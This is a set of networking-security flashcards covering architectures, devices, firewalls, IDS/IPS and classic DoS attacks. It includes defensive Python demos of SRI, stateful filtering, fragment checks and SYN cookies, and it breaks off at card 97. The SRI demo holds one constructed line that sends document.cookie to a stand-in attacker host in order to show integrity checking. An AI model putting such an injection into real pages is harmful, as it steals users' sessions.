Domain 4 Flashcards

1
Q

Network Architectures
VXLAN - Virtual Extensible LAN

A

Network virtualization enabling network segmentation at high scale.

Overcomes VLAN scale limitations: the 12-bit VLAN ID allows 4,096 VLANs, whereas the 24-bit VXLAN Network Identifier (VNI) allows about 16 million segments.

Tunneling protocol that encapsulates an Ethernet frame (layer 2) in a UDP packet (UDP port 4789). The VNI travels in cleartext and is not authenticated, so VXLAN segmentation is only as strong as the filtering between VTEPs on the underlay.
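As an added example (not part of the flashcards), the following code builds and parses the 8-byte VXLAN header in front of an Ethernet frame. The outer IP/UDP headers are omitted and the sample frame bytes are constructed; it shows that the VNI is a plain 24-bit field with no integrity protection.

```python
# Added example (not from the flashcards): build and parse the 8-byte VXLAN
# header (RFC 7348) in front of an Ethernet frame. Outer IP/UDP headers are
# omitted; the sample frame bytes are constructed.
import struct

VXLAN_UDP_PORT = 4789        # IANA-assigned destination port for VXLAN
FLAG_VNI_VALID = 0x08        # the "I" bit: VNI field is valid


def build_vxlan(vni: int, inner_frame: bytes) -> bytes:
    """Encapsulate an Ethernet frame: flags(1) reserved(3) VNI(3) reserved(1) + frame."""
    if not 0 <= vni < 1 << 24:
        raise ValueError("VNI is a 24-bit field (0..16777215)")
    header = bytes([FLAG_VNI_VALID, 0, 0, 0]) + vni.to_bytes(3, "big") + b"\x00"
    return header + inner_frame


def parse_vxlan(udp_payload: bytes) -> dict:
    """Return the VNI and the inner Ethernet header fields. Everything here is
    plaintext and unauthenticated: any host that can reach the VTEP's UDP port
    can supply its own VNI."""
    if len(udp_payload) < 8 + 14:
        raise ValueError("too short for a VXLAN header plus an Ethernet header")
    flags = udp_payload[0]
    if not flags & FLAG_VNI_VALID:
        raise ValueError("VNI-valid flag not set")
    vni = int.from_bytes(udp_payload[4:7], "big")
    inner = udp_payload[8:]
    (ethertype,) = struct.unpack("!H", inner[12:14])
    return {
        "vni": vni,
        "dst_mac": inner[0:6].hex(":"),
        "src_mac": inner[6:12].hex(":"),
        "ethertype": ethertype,
        "inner_payload": inner[14:],
    }


# Constructed inner frame: dst MAC, src MAC, EtherType 0x0800 (IPv4), 4 payload bytes
SAMPLE_FRAME = (bytes.fromhex("001122334455") + bytes.fromhex("aabbccddeeff")
                + b"\x08\x00" + b"\xde\xad\xbe\xef")


def demo(vni: int = 5000) -> dict:
    """Round-trip the sample frame through a VXLAN header with the given VNI."""
    return parse_vxlan(build_vxlan(vni, SAMPLE_FRAME))


if __name__ == "__main__":
    print(demo())
```

The practical consequence: a VNI is a routing tag, not a security boundary. Restrict UDP/4789 to known VTEP addresses on the underlay, or run the tunnels over IPsec, if tenants must not be able to forge each other's segments.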

2
Q

Network Architectures
Software Defined Networks (SDNs)

A

A network architecture approach that enables the network to be intelligently and centrally controlled, or programmed, using software.

  • Has the capacity to reprogram the data plane at any time
  • Use cases include SD-LAN and SD-WAN
  • Separating the control plane from the data plane opens a number of security challenges; the controller becomes a single high-value target
  • Vulnerable to attacks like MITM and DoS, especially on the controller-to-switch (southbound) channel

Secured with TLS (e.g., mutual TLS on the OpenFlow channel)

3
Q

Network Architectures
Software Defined Wide Area Networks (SD-WAN)

A

Enables users in branch offices to remotely connect to an enterprise's network.

Enables use of many transport services like MPLS, LTE, and broadband internet to securely connect users to apps.

Security is based mostly on IPsec VPN tunnels, next-generation firewalls (NGFWs), and micro-segmentation of app traffic.

Uses a centralized control function for intelligent routing; often combined with Secure Access Service Edge (SASE) to decentralize connectivity and security enforcement.

4
Q

Network Architectures
Light Fidelity (Li-Fi)

A

Uses the modulation of light intensity to transmit data (uses LEDs).

Can safely function in areas otherwise susceptible to electromagnetic interference.

Can theoretically transmit at speeds of up to 100 Gbit/s.

  • Li-Fi only requires working LED lights
  • Visible light cannot penetrate opaque walls, which limits eavesdropping to the room where the light is visible
5
Q

Network Architectures
Zigbee - Personal Area Network (PAN)

A

Short-range wireless.

Developed to support automation, machine-to-machine comms, remote control, and monitoring of IoT devices.

Supports both centralized and distributed security models and a mesh topology.

Assumes that the symmetric keys used are transmitted securely (encrypted in transit).

NOTE - During pre-configuration of a new device, a single key may be sent unprotected (or protected only by a well-known default key), creating a brief window of vulnerability.

Example: IoT smart home hub.

6
Q

Cellular Networking
5th Gen Cellular 5G

A

Faster speeds and lower latency.

  • Unlike 4G, 5G does not send the permanent subscriber identity (from the SIM) in the clear over the air; it is concealed, and temporary identifiers are assigned to each device
  • Some air-interface threats, such as session hijacking, are addressed in 5G
  • NOTE: Non-Standalone (NSA) 5G deployments anchor control signaling to the 4G (LTE) core
  • Diameter protocol: provides authentication, authorization, and accounting (AAA) in the 4G core and will remain a target
  • Old vulnerabilities of 3G/4G are still a threat because 5G NSA relies on them
  • DDoS is a concern because IoT endpoint counts on 5G are exponentially greater
7
Q

Content Delivery Networks (CDN)

A

Geographically distributed network of proxy servers and their data centers.

  • Goal is fast and highly available content delivery by distributing content spatially relative to users
  • CDNs serving JavaScript have been targeted to inject malicious content into pages; Subresource Integrity (SRI) hashes let the browser reject a tampered script
  • CDN vendors offer DDoS protection and Web Application Firewalls (WAF)
  • Ex) video streaming, software download, audio streaming
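As an added example (not part of the flashcards), the following code shows the Subresource Integrity check that defends against the CDN script-injection case above: the page pins a hash of the script it expects, and a modified copy fails the check. The script bytes and the attacker's appended line are constructed.

```python
# Added example (not from the flashcards): Subresource Integrity (SRI) lets a
# page pin the exact script it expects from a CDN, so a swapped or injected
# file fails the browser's check. The script bytes below are constructed.
import base64
import hashlib

SRI_ALGOS = ("sha256", "sha384", "sha512")   # ordered weakest to strongest


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Value for the integrity="" attribute: '<algo>-<base64 digest>'."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def sri_check(content: bytes, integrity: str) -> bool:
    """Mimics the browser: of the listed hashes, only those using the strongest
    supported algorithm count, and any one of them may match the fetched bytes.
    If no usable metadata is present the resource loads unchecked (per spec)."""
    tokens = [t.partition("-") for t in integrity.split()]
    usable = [(algo, digest) for algo, _, digest in tokens if algo in SRI_ALGOS]
    if not usable:
        return True
    strongest = max(usable, key=lambda ad: SRI_ALGOS.index(ad[0]))[0]
    return any(sri_hash(content, algo) == f"{algo}-{digest}"
               for algo, digest in usable if algo == strongest)


# Constructed script as published, and the same script with an injected exfil line
ORIGINAL = b"window.app = {init: function () { console.log('ready'); }};\n"
TAMPERED = ORIGINAL + b"new Image().src = 'https://attacker.invalid/?c=' + document.cookie;\n"
INTEGRITY = sri_hash(ORIGINAL)   # computed once when the page is built


def script_tag(src: str) -> str:
    """The <script> element the page embeds; crossorigin is required for SRI on cross-origin loads."""
    return f'<script src="{src}" integrity="{INTEGRITY}" crossorigin="anonymous"></script>'


if __name__ == "__main__":
    print(script_tag("https://cdn.example/app.js"))
    print("original passes:", sri_check(ORIGINAL, INTEGRITY))
    print("tampered passes:", sri_check(TAMPERED, INTEGRITY))
```

SRI only helps for resources whose content is fixed at build time; a script the CDN legitimately updates in place needs its integrity value regenerated with each release.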
8
Q

OSI Model

A
  7. Application
  6. Presentation
  5. Session
  4. Transport
  3. Network
  2. Data Link
  1. Physical

All People Seem To Need Data Processing (top down, layer 7 to layer 1)

9
Q

Standard Network Topologies
STAR

A

Employs a centralized connection device

  • Can be a simple hub or switch
  • Each system is connected to the central hub by a dedicated segment
10
Q

Standard Network Topologies
MESH

A

Connects systems to all other systems using numerous paths

  • A partial mesh is possible
  • BENEFIT provides redundant connections to systems, allowing multiple segment failures without seriously affecting connectivity
11
Q

Standard Network Topologies
RING

A

Connects each system as points on a circle
- The connection medium acts as a unidirectional transmission loop
- Only one system can transmit data at a time; traffic management is performed by a token

NOTE Token Ring is a ring-based network

12
Q

Standard Network Topologies
BUS

A

Connects each system to a trunk or backbone cable
- All systems on the bus can transmit data simultaneously, which can result in collisions
- A collision occurs when two systems transmit data at the same time; the signals interfere with each other

NOTE Original coaxial Ethernet (10BASE2/10BASE5) is a bus network; modern switched Ethernet is wired as a star

13
Q

Analog Signals

A

Communications occur with a continuous signal that varies in frequency, amplitude, or phase

  • Variances occur in a wave shape
  • Communication is altered / corrupted over long distances due to interference
14
Q

Digital Signals

A

Comms occur through the use of a discontinuous electrical signal and a state change or on / off pulses

1s and 0s

  • More reliable than analog
  • Uses voltage levels, where voltage ON is 1 and voltage OFF is 0
15
Q

Synchronous Communication

A

Relies on a timing or clocking mechanism based on either an independent clock or a time stamp embedded in the data stream

  • Typically supports high rates of data transfer. Example: networking
16
Q

Asynchronous Communication

A

Relies on start and stop delimiter bits to manage the transmission of data

  • Best suited for smaller amounts of data
  • EX) Public switched telephone network (PSTN) modems
17
Q

Baseband

A

Supports only a single communication channel

  • It uses a direct current applied to the cable. A current at a higher level represents the binary 1 and a lower level represents 0
  • Is a form of digital signal
  • EX) Ethernet
18
Q

Broadband

A

Can support multiple simultaneous signals; uses frequency modulation to support numerous channels
- Each channel supports a distinct communication session. Suitable for high throughput rates, especially when several channels are multiplexed
- Is a form of analog signal
- EX) TV, cable modem, ISDN, DSL, T1, T3

19
Q

Broadcast

A

Technology supports comms to ALL possible recipients

20
Q

Multicast

A

Technology supports comms to multiple specific recipients

21
Q

Unicast

A

Technology supports only a single comm to a specific recipient

22
Q

Carrier Sense Multiple Access (CSMA)

A

Developed to decrease the chances of collisions when two or more stations start sending their signals over the data link layer. Requires that each station first check the state of the medium before sending.

23
Q

CSMA variations and collisions
CSMA/CA (collision avoidance)

A

Attempts to avoid collisions by granting only a single permission to communicate at any given time (e.g., 802.11 Wi-Fi, which uses random backoff before transmitting and optional RTS/CTS)

24
Q

CSMA variations and collisions
CSMA/CD (collision detection)

A

Responds to collisions by having each member of the collision domain wait for a short but random period of time before starting the process over (e.g., classic half-duplex Ethernet).

25
Q

Token Passing

A

Performs comms using a digital token. Once its transmission is complete, a system releases the token to the next system.

NOTE Prevents collisions in ring networks

26
Q

Polling

A

Performs comms using a primary/secondary (master/slave) configuration. The primary system polls each secondary system in turn to ask whether it needs to transmit data.

NOTE Used by Synchronous Data Link Control (SDLC), a layer 2 protocol used by IBM

27
Q

Network Segmentation
Intranet

A

A private network that is designed to host the same information services found on the internet.

28
Q

Network Segmentation
Extranet

A

A section of an org's network that has been sectioned off to act as an intranet for the private network but also serves information to outside parties (business partners, or the public internet)

NOTE A cross between the Internet and an intranet

29
Q

Network Segmentation
DMZ

A

An extranet for public consumption; typically labeled a perimeter network or screened subnet

30
Q

Network Segmentation
Reasons for segmentation

A
  • Boosting Performance where systems that often communicate are in the same segment
  • Reducing comm problems: reduces congestion and contains problems into each segment
  • Providing Security: isolates traffic and user access to those segments where they are authorized
31
Q

Bluetooth (IEEE 802.15)

A

Is a Personal Area Network

  • Pairing has the primary device scan the 2.4 GHz band for available devices
  • Pairing with a 4-digit PIN helps prevent accidental pairings but is not a strong security control
32
Q

Mobile System Attacks
Bluejacking

A

Annoyance
- Pushing unsolicited messages to nearby Bluetooth devices using a loophole in the technology's messaging options

33
Q

Mobile System Attacks
Bluesnarfing

A

Data theft
- Wirelessly connecting to early Bluetooth-enabled mobile devices without the owner's consent to steal data

34
Q

Mobile System Attacks
Bluebugging

A

Grants attackers remote control over the features / functions of a Bluetooth device, including the ability to turn on the device's microphone and use it as a bug

35
Q

Service Set Identifier ( SSID ) Broadcast

A

Wireless networks traditionally announce their SSID on a regular basis with a beacon frame

  • When the SSID is broadcast, any device can automatically detect and connect to the network
  • Hiding the SSID is security through obscurity; the name is still visible in client probe and association traffic
36
Q

Temporal Key Integrity Protocol (TKIP)

A

Was designed as the replacement for WEP without the need to replace legacy hardware.

  • Implemented in 802.11 wireless networking under the name WPA (Wi-Fi Protected Access)
  • Still built on RC4; now deprecated and should not be used where CCMP/WPA2 or WPA3 is available
37
Q

CCMP

A

Counter Mode with Cipher Block Chaining Message Authentication Code Protocol

  • Created to replace WEP and TKIP/WPA
  • Uses AES (Advanced Encryption Standard) with a 128-bit key; the basis of WPA2 (802.11i)
38
Q

Fibre Channel

A

A form of network data storage solution, like a Storage Area Network (SAN) or Network-Attached Storage (NAS), that allows for high-speed file transfers

39
Q

Fibre Channel over Ethernet (FCoE)

A

Used to encapsulate Fibre Channel comms over Ethernet networks

40
Q

Internet Small Computer System Interface (iSCSI)

A

a networking storage standard based on IP

41
Q

Site Survey

A

The process of investigating the presence, strength and reach of wireless access points deployed in an environment

42
Q

Extensible Authentication Protocol (EAP)

A

Authentication framework allows for new authentication technologies to be compatible with existing wireless or point-to-point connection technologies

43
Q

Protected EAP (PEAP)

A

Encapsulates EAP method within a TLS tunnel that provides authentication and potentially encryption

44
Q

Lightweight EAP (LEAP)

A

Cisco proprietary alternative to TKIP for WPA. Developed to address deficiencies in TKIP before the 802.11i/WPA2 standard was ratified. Now considered insecure: its MS-CHAPv2-based exchange is vulnerable to offline dictionary attacks (the ASLEAP tool), so it should not be deployed.

45
Q

MAC Filtering

A

A list of authorized wireless client interface MAC addresses

  • Used by a wireless access point to block access to all non-authorized devices
  • Weak control: MAC addresses are transmitted in the clear, so an attacker can sniff an authorized address and spoof it
46
Q

Captive Portals

A

Authentication technique that redirects a newly connected wireless web client to a portal access control page

  • Ex) NCSU Guest wifi
47
Q

Network Devices
Firewalls

A

Used to filter traffic based on rules

48
Q

Network Devices
Switch

A

Repeats traffic only out to the port on which the destination is known to exist.

  • Greater efficiency for traffic delivery, create separate collision domains, improve overall data throughput

NOTE Usually layer 2, sometimes layer 3

49
Q

Network Devices
Router

A

Controls traffic flow on network and are often used to connect similar networks and control traffic flow between the two.

  • Can function using statically defined routing tables, or employ dynamic routing system

NOTE Layer 3

50
Q

Network Devices
Gateways

A

Connects networks that are using different network protocols. Also known as protocol translators; can be hardware devices or software services.

NOTE Commonly placed at layer 3, though protocol translation can occur at any layer up to layer 7

51
Q

Network Devices
Repeaters, Concentrators, Amplifiers

A

Strengthen the comms signal over a cable segment and connect network segments that use the same protocol

Layer 1

52
Q

Network Devices
Bridges

A

Connect 2 networks (could have different topologies, cabling types, and speeds) in order to connect network segments that use the same protocol

Layer 2

53
Q

Network Devices
Hubs

A

Connect multiple systems and connect network segments that use the same protocol.

  • Multiport repeater

Layer 1

54
Q

Network Devices
LAN Extenders

A

Remote access, multilayer switch used to connect distant networks over WAN

55
Q

LAN & WAN Technologies
Private Circuit

A

Use dedicated physical circuits

Examples:
- Dedicated or leased lines
- Point-To-Point Protocol (PPP)
- Serial Line Internet Protocol (SLIP)
- Integrated Services Digital Network (ISDN)
- Digital Subscriber Line (DSL)

56
Q

LAN & WAN Technologies
Packet-switching

A

Use virtual circuits instead of dedicated physical circuits.
- Efficient and cost effective

Examples:
- X.25, Frame Relay
- Asynchronous Transfer Mode (ATM)
- Synchronous Data Link Control (SDLC)
- High-Level Data Link Control (HDLC)

57
Q

Firewalls
Static Packet-Filtering Firewalls

A

Filters traffic by examining data from the message header (source / destination address, port, protocol)

Operates at layer 3 (using layer 4 port information as well)

58
Q

Firewalls
Application-Level Firewalls

A

Filters based on a single internet service, protocol, or application

Operates at layer 7

59
Q

Firewalls
Circuit-Level Firewalls

A

Used to establish comms sessions between trusted partners.
Example)
- SOCKS

Operates at layer 5

60
Q

Firewalls
Stateful Inspections Firewalls

A

Evaluate the state, session, or context of network traffic

61
Q

Firewalls
Deep Packet Inspection Firewalls

A

A Filtering mechanism that operates typically at the application layer in order to filter the payload contents of a comm rather than only on the header values.

62
Q

Firewalls
Stateless Firewalls

A

Watch network traffic and restrict or block packets based on source and destination addresses or other static header values

  • Not aware of traffic patterns or data flows
  • Do better for heavy traffic loads
63
Q

Firewalls
Stateful Firewalls

A

Can watch traffic streams from end to end

  • Are aware of comm paths and track each session in a state table
  • Can implement IPsec functions like tunnels / encryption
  • Better at identifying unauthorized or forged comms, since a packet is only admitted if it belongs to a known session
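As an added example (not part of the flashcards), the following toy packet filter contrasts the two cards above: a stateless rule that admits any inbound packet with the ACK bit set versus a stateful table that admits only replies to sessions opened from inside. The addresses, ports and flag model are constructed for illustration.

```python
# Added example (not from the flashcards): a toy packet filter showing why a
# stateless "allow inbound if ACK is set" rule is weaker than a stateful table.
# Addresses, ports and the TCP flag model are constructed for illustration.
import ipaddress
from dataclasses import dataclass

INTERNAL = ipaddress.ip_network("10.0.0.0/8")   # assumed "inside" network


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    flags: frozenset          # subset of {"SYN", "ACK", "FIN", "RST"}


def _inbound(pkt: Packet) -> bool:
    return ipaddress.ip_address(pkt.dst) in INTERNAL and ipaddress.ip_address(pkt.src) not in INTERNAL


def _outbound(pkt: Packet) -> bool:
    return ipaddress.ip_address(pkt.src) in INTERNAL and ipaddress.ip_address(pkt.dst) not in INTERNAL


def stateless_filter(pkt: Packet) -> str:
    """Decides from header fields alone. The classic 'established' rule only
    checks the ACK bit, which an attacker can set on any packet."""
    if _outbound(pkt):
        return "ALLOW"
    if _inbound(pkt) and "ACK" in pkt.flags:
        return "ALLOW"
    return "DENY"


class StatefulFilter:
    """Records outbound connection attempts and admits inbound packets only
    when they belong to a session an inside host opened."""

    def __init__(self):
        self.table = set()    # (inside_ip, inside_port, outside_ip, outside_port)

    def decide(self, pkt: Packet) -> str:
        if _outbound(pkt):
            key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
            if "SYN" in pkt.flags and "ACK" not in pkt.flags:
                self.table.add(key)            # new session initiated from inside
                return "ALLOW"
            return "ALLOW" if key in self.table else "DENY"
        if _inbound(pkt):
            key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
            if key in self.table:
                if "RST" in pkt.flags:
                    self.table.discard(key)    # simplified teardown
                return "ALLOW"
        return "DENY"


# Constructed traffic: a legitimate handshake from inside, then a forged
# inbound packet with the ACK bit set that belongs to no session.
LEGIT_SYN    = Packet("10.1.2.3", "198.51.100.7", 51000, 443, frozenset({"SYN"}))
LEGIT_SYNACK = Packet("198.51.100.7", "10.1.2.3", 443, 51000, frozenset({"SYN", "ACK"}))
LEGIT_ACK    = Packet("10.1.2.3", "198.51.100.7", 51000, 443, frozenset({"ACK"}))
FORGED_ACK   = Packet("203.0.113.9", "10.1.2.3", 4444, 22, frozenset({"ACK"}))


def run_scenario() -> dict:
    """Returns {label: (stateless decision, stateful decision)} for the four packets."""
    stateful = StatefulFilter()
    results = {}
    for label, pkt in [("syn", LEGIT_SYN), ("synack", LEGIT_SYNACK),
                       ("ack", LEGIT_ACK), ("forged", FORGED_ACK)]:
        results[label] = (stateless_filter(pkt), stateful.decide(pkt))
    return results


if __name__ == "__main__":
    for label, (stateless, stateful) in run_scenario().items():
        print(f"{label:7s} stateless={stateless:5s} stateful={stateful}")
```

The forged packet is the point of the exercise: "ACK set" is a heuristic for "part of an existing connection", and the stateless filter has nothing else to go on. Real stateful firewalls additionally check sequence numbers and time entries out, which the simplified table above omits.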
64
Q

Firewalls
Web Application Firewalls (WAF)

A

Protects web apps by filtering HTTP traffic between the app and the internet.
- Typically protects web apps against common attacks like XSS, CSRF, and SQL injection
- Some come preconfigured with the OWASP Core Rule Set (CRS)

65
Q

Firewalls
Next Generation Firewalls

A

A deep packet inspection firewall that moves beyond port / protocol inspection and blocking.
- Adds application-level inspection and brings in intelligence from outside the firewall (threat feeds, identity)

66
Q

Firewalls
Unified Threat Management (UTM)

A

A multifunction device (MFD) composed of several security features in addition to a firewall:
- May include IDS, IPS, TLS/SSL proxy, web filtering, QoS management, bandwidth throttling, NAT, VPN, antivirus
- Hard to scale; common in small and medium businesses (SMB)

67
Q

Firewalls
Network Address Translation Gateway (NAT)

A

Allows private subnets to comm with the internet but hides the internal network from internet users

  • In cloud deployments, the NAT gateway is the route target for the private subnets' outbound traffic; NAT hides addresses but is not a substitute for firewall rules or network ACLs on those subnets
68
Q

Firewalls
Content / URL Filter

A

Looks at the content of the webpage and blocks based on filters

  • Used to block inappropriate content in the context of the situation
  • associated with deep-packet inspection
69
Q

Firewalls
Open-Source

A

Vendor makes the license freely available and allows access to the source code

  • Community rather than vendor support (paid support may be sold separately)
  • Popular option is pfSense
70
Q

Firewalls
Proprietary

A

More expensive but tends to provide more / better protection and more functionality / support (at a cost)

  • no source code access
71
Q

Firewalls
Hardware

A

Piece of purpose-built network hardware

  • May offer more config support for LAN and WAN
  • Often has better throughput because it is designed for the speeds and connection counts common to an enterprise network
72
Q

Firewalls
Software

A

Installed on your own hardware

  • Provides more flexibility; can be on any host
  • Host-based (software) firewalls are more exposed in some respects because they share the host's attack surface
73
Q

Firewalls
Application

A

Typically just for application comms

  • Often HTTP / Web Traffic
  • Ex) NGFW
74
Q

Firewalls
Host-Based

A

An app installed on a host OS, both client and server OSs

75
Q

Firewalls
Virtual

A

In the cloud, firewalls are implemented as Virtual Network Appliances (VNA)

  • Available from both CSP and 3rd parties
76
Q

Intrusion Detection System (IDS)

A

Analyzes whole packets, both header and payload, looking for known events.

  • When event is detected, a log message is created

Reports and / or alerts

77
Q

Intrusion Prevention System (IPS)

A

Analyzes whole packets, both header and payload, looking for known events.

  • When event is detected, packet is rejected

Takes Action

78
Q

Types of IDSs
Behavior Based

A

Creates a baseline of activity to ID normal behavior and then measure system performance against the baseline to detect abnormal behavior

  • Can detect previously unknown attack methods
79
Q

Types of IDSs
Knowledge Based

A

Uses signatures similar to the signature definitions used by anti-malware software

  • Only effective against known attack methods
80
Q

Host Based IDS and IPS (HIDS, HIPS)

A

IDS / IPS in software form, installed on a host (often a server)

81
Q

Network Based IDS and IPS (NIDS, NIPS)

A

IDS / IPS at the network level, often in hardware form

82
Q

NIDS / NIPS Modes of Operation
Inline (in-band)

A

Traffic passes through the NIDS / NIPS, so it can drop packets; typically placed on or near the firewall as an additional layer of security

83
Q

NIDS / NIPS Modes of Operation
Passive (out-of-band)

A

Traffic does NOT go through the NIDS / NIPS; it sees a copy (via a SPAN/mirror port or a network tap), so it can alert but not block inline

  • Sensors and collectors forward alerts to the NIDS
84
Q

Network Appliances
Sensors and Collectors

A

Can be placed on a network to alert NIDS of any changes in traffic patterns on the network.

  • If you place a sensor on the Internet side of the network, it can scan all of the traffic from the internet
85
Q

Secure Network Design
Bastion Host

A

Computer or Appliance that is exposed on the internet and has been hardened by removing all unnecessary elements, such as services, programs, protocols, and ports

Hardened

86
Q

Secure Network Design
Screened Host

A

A firewall-protected system logically positioned just inside a private network

More secure than a bastion host alone, since a firewall screens traffic before it reaches the host

87
Q

Secure Network Design
Screened Subnet

A

Similar to Screened host in concept.

Subnet is placed between 2 routers or firewalls and the bastion host(s) is located within that subnet

88
Q

Secure Network Design
Proxy Server

A

Functions on behalf of the client requesting service masking the true origin of the request to the resource

89
Q

Secure Network Design
Honeypot

A

Lures attackers into interacting with a decoy system so their activity can be observed

  • Only ENTICE, never entrap

Example:
- Leaving a fake payroll file where an attacker will find it is enticement (the attacker decides to take it); tricking someone into an illegal act they would not otherwise commit is entrapment

GOAL to distract from real assets and isolate the attacker in a padded cell until you can track them down

90
Q

Network Attacks
Teardrop Attack

A

DoS attack that involves sending fragmented packets to a target machine

  • The fragment offsets overlap; a bug in the target's TCP/IP fragment reassembly code crashes the machine when it tries to reassemble them
91
Q

Network Attacks
Fraggle Attack

A

DoS attack that involves sending a large amount of spoofed UDP traffic to a network's broadcast address, with the victim as the spoofed source so every host replies to it

  • Smurf attack does the same thing but with ICMP echo requests
92
Q

Network Attacks
SYN Flood

A

DoS attack where the attacker sends a large number of SYN requests to a target system in an attempt to fill its half-open connection backlog and make the system unresponsive to legitimate traffic. Mitigations: SYN cookies, shorter SYN-RECEIVED timeouts, rate limiting.

93
Q

Network Attacks
Ping of Death

A

Sends an oversized ping packet

  • Max IPv4 packet size is 65,535 bytes
  • PoD sends fragments that reassemble to more than 65,535 bytes, overflowing the receive buffer of vulnerable stacks
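As an added example (not part of the flashcards), the following defensive fragment reassembler rejects both malformed-fragment patterns from the Teardrop and Ping of Death cards above: overlapping fragments, and fragments that would reassemble past the IPv4 size limit. Offsets are treated as byte offsets into the IP payload for readability (real headers count 8-byte units), and the sample fragment lists are constructed.

```python
# Added example (not from the flashcards): a defensive IPv4 fragment reassembler
# that rejects the two malformed-fragment patterns behind Teardrop and Ping of
# Death. Offsets are in bytes within the IP payload (real headers use 8-byte
# units); the 65,535-byte cap is the IPv4 total-length limit.
MAX_IP_DATAGRAM = 65535


class FragmentError(ValueError):
    """Raised instead of letting a bad fragment reach the reassembly buffer."""


class Reassembler:
    def __init__(self):
        self.fragments = []       # list of (offset, data)
        self.total_len = None     # known once the last fragment (MF=0) arrives

    def add(self, offset: int, data: bytes, more_fragments: bool):
        """Accept one fragment; returns the reassembled datagram when complete,
        None while fragments are still missing."""
        end = offset + len(data)
        if offset < 0 or end > MAX_IP_DATAGRAM:
            raise FragmentError(f"fragment ends at {end}, beyond {MAX_IP_DATAGRAM} (Ping of Death pattern)")
        for off, existing in self.fragments:
            if offset < off + len(existing) and off < end:
                raise FragmentError(f"fragment [{offset},{end}) overlaps [{off},{off + len(existing)}) (Teardrop pattern)")
        if not more_fragments:
            if self.total_len is not None:
                raise FragmentError("second 'last' fragment")
            self.total_len = end
        elif self.total_len is not None and end > self.total_len:
            raise FragmentError("fragment extends past the declared end")
        self.fragments.append((offset, data))
        return self._assemble()

    def _assemble(self):
        if self.total_len is None:
            return None
        out, pos = bytearray(), 0
        for off, data in sorted(self.fragments):
            if off != pos:
                return None       # hole: still waiting for a fragment
            out += data
            pos += len(data)
        return bytes(out) if pos == self.total_len else None


def reassemble(fragments):
    """fragments: iterable of (offset, data, more_fragments). Returns bytes,
    None if incomplete, or raises FragmentError."""
    r = Reassembler()
    result = None
    for off, data, mf in fragments:
        result = r.add(off, data, mf)
    return result


def rejects(fragments) -> bool:
    """True if the reassembler refuses the fragment set."""
    try:
        reassemble(fragments)
    except FragmentError:
        return True
    return False


# Constructed fragment sets
NORMAL   = [(0, b"A" * 8, True), (8, b"B" * 8, False)]
REORDER  = [(8, b"B" * 8, False), (0, b"A" * 8, True)]
TEARDROP = [(0, b"A" * 16, True), (8, b"C" * 4, False)]        # second fragment lands inside the first
OVERSIZE = [(0, b"x" * 8, True), (65528, b"y" * 8, False)]     # reassembles to 65,536 bytes

if __name__ == "__main__":
    print(reassemble(NORMAL))
    print("teardrop rejected:", rejects(TEARDROP))
    print("ping of death rejected:", rejects(OVERSIZE))
```

The two checks map directly to the two attacks: the overlap test is what the vulnerable reassembly code lacked in Teardrop, and the length cap is what lets a Ping of Death write past a fixed 64 KiB buffer. Modern stacks also limit how long incomplete fragment sets are held, which the toy omits.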
94
Q

TCP 3-Way Handshake

A

Client –> SYN –> Server
Client <– SYN + ACK <– Server
Client –> ACK –> Server
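As an added example (not part of the flashcards), the following toy server models the three-way handshake above together with the SYN flood card: without mitigation, spoofed SYNs fill the half-open backlog and a legitimate client is dropped; with SYN cookies, the server encodes its sequence number from a keyed hash of the client's address and keeps no per-SYN state. Addresses and sequence numbers are constructed, and the cookie omits the timestamp/MSS encoding a real kernel folds in.

```python
# Added example (not from the flashcards): a toy TCP server modelling the
# 3-way handshake, the half-open backlog a SYN flood exhausts, and SYN cookies
# as a stateless mitigation. Addresses and sequence numbers are constructed;
# the cookie omits the timestamp/MSS encoding a real kernel uses.
import hashlib
import hmac
import itertools
import os


class TcpServer:
    def __init__(self, backlog=4, syn_cookies=False):
        self.backlog = backlog
        self.syn_cookies = syn_cookies
        self.half_open = {}           # client (ip, port) -> server ISN, awaiting final ACK
        self.established = set()
        self._secret = os.urandom(16)
        self._isn = itertools.count(1000)

    def _cookie(self, client):
        """Server ISN derived from the client tuple with a keyed hash: nothing to store."""
        mac = hmac.new(self._secret, f"{client[0]}:{client[1]}".encode(), hashlib.sha256).digest()
        return int.from_bytes(mac[:4], "big")

    def on_syn(self, client, client_isn):
        """Step 1 -> 2: client SYN in, server SYN+ACK out as (seq, ack). None = dropped."""
        if self.syn_cookies:
            server_isn = self._cookie(client)
        else:
            if len(self.half_open) >= self.backlog:
                return None                       # backlog full: legitimate SYNs are dropped
            server_isn = next(self._isn)
            self.half_open[client] = server_isn
        return server_isn, client_isn + 1

    def on_ack(self, client, ack):
        """Step 3: the final ACK must acknowledge server_isn + 1."""
        if self.syn_cookies:
            expected = self._cookie(client) + 1   # recompute; no table lookup
        else:
            isn = self.half_open.pop(client, None)
            if isn is None:
                return False
            expected = isn + 1
        if ack != expected:
            return False
        self.established.add(client)
        return True


def handshake(server, client=("192.0.2.10", 40000), client_isn=7):
    """Runs a full 3-way handshake; returns True if the connection is established."""
    reply = server.on_syn(client, client_isn)      # Client -> SYN -> Server
    if reply is None:
        return False
    server_isn, ack = reply                        # Client <- SYN+ACK <- Server
    assert ack == client_isn + 1
    return server.on_ack(client, server_isn + 1)   # Client -> ACK -> Server


def syn_flood(server, count):
    """Spoofed-source SYNs that never complete; each one parks in the backlog."""
    for i in range(count):
        server.on_syn((f"203.0.113.{i % 250 + 1}", 50000 + i), 1)


def demo():
    """Flood a plain server and a SYN-cookie server, then try a real handshake on each."""
    plain = TcpServer(backlog=4)
    syn_flood(plain, 4)
    cookies = TcpServer(backlog=4, syn_cookies=True)
    syn_flood(cookies, 10_000)
    return {"plain": handshake(plain), "syn_cookies": handshake(cookies)}


if __name__ == "__main__":
    print(demo())    # {'plain': False, 'syn_cookies': True}
```

The SYN-cookie server still has to check the final ACK against a recomputed value, so a forged ACK with a guessed number fails just as it would against the state table; what changes is that the flood costs the server one hash per SYN instead of one backlog slot.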

95
Q

ID vs AuthN
Identification

A

Subjects claim an ID

96
Q

ID vs AuthN
Authentication

A

Subjects prove their identity by providing credentials

97
Q

AuthZ vs Accountability
Authorization

A

